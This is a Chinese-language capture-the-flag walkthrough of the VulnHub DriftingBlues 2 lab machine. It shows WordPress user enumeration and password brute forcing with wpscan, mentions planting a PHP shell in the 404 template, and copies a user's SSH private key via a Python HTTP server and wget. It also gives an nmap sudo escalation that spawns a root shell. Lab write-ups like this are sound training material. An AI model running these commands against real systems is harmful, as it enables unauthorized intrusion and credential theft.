​vbox匯入，網路橋接。

靶機下載地址：https://download.vulnhub.com/driftingblues/driftingblues2.ova

 一：資訊收集

1；主機發現。

 2；開放服務埠。ftp匿名登入。

  3；ftp匿名登入的一張圖片。

 4；把圖片複製到kali裡面，利用工具steghide 檢視一下圖片裡的資訊，需要密碼，emmmm,什麼都沒有。

 5；沒發現其他，我們目錄遍歷一下。

nikto -h http://192.168.1.23  新掃描目標站點下有無目錄的工具

 6；一個登入框。新增本地host，因為/blog原始碼裡面有個域名。

192.168.1.23 

 ​

6；一個登入框。新增本地host，因為/blog原始碼裡面有個域名。by albert?可能是使用者名稱。

192.168.1.23 driftingblues.box，在hosts新增。

 那就用wp-scan工具掃描一下有沒有使用者名稱或者可利用的外掛。確定是albert是使用者名稱。

wpscan --url http://192.168.1.23/blog/ -e u 

 7；爆破一下這個使用者的密碼。albert/scotland1

wpscan --url http://192.168.1.23/blog/ --passwords /usr/share/wordlists/rockyou.txt --usernames albert
 

 8；登入成功。

 二；漏洞利用

1；往404頁面寫個PHPshell進去，儲存，凱莉開啟監聽，訪問一個不存在的路徑。

 2；監聽成功。升級一下shell。

  3；在home目錄下發現一個freddie使用者，還發現了.ssh的檔案，進入 .ssh 資料夾，發現存在公私鑰資訊檔案，且私鑰檔案可讀可執行。

​

可以直接複製貼上到檔案上去。

也可以開服務，卡莉下載私鑰檔案。

python2 -m SimpleHTTPServer 9998

wget http://192.168.1.23:9998/id_rsa 

 4；利用私鑰檔案，登入freddie使用者，

​

 5；看到有root許可權，nmap提權。提權成功，兩個flag。

https://gtfobins.github.io/查詢nmap

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

​使用 python 切換 bash：python3 -c 'import pty; pty.spawn("/bin/bash")'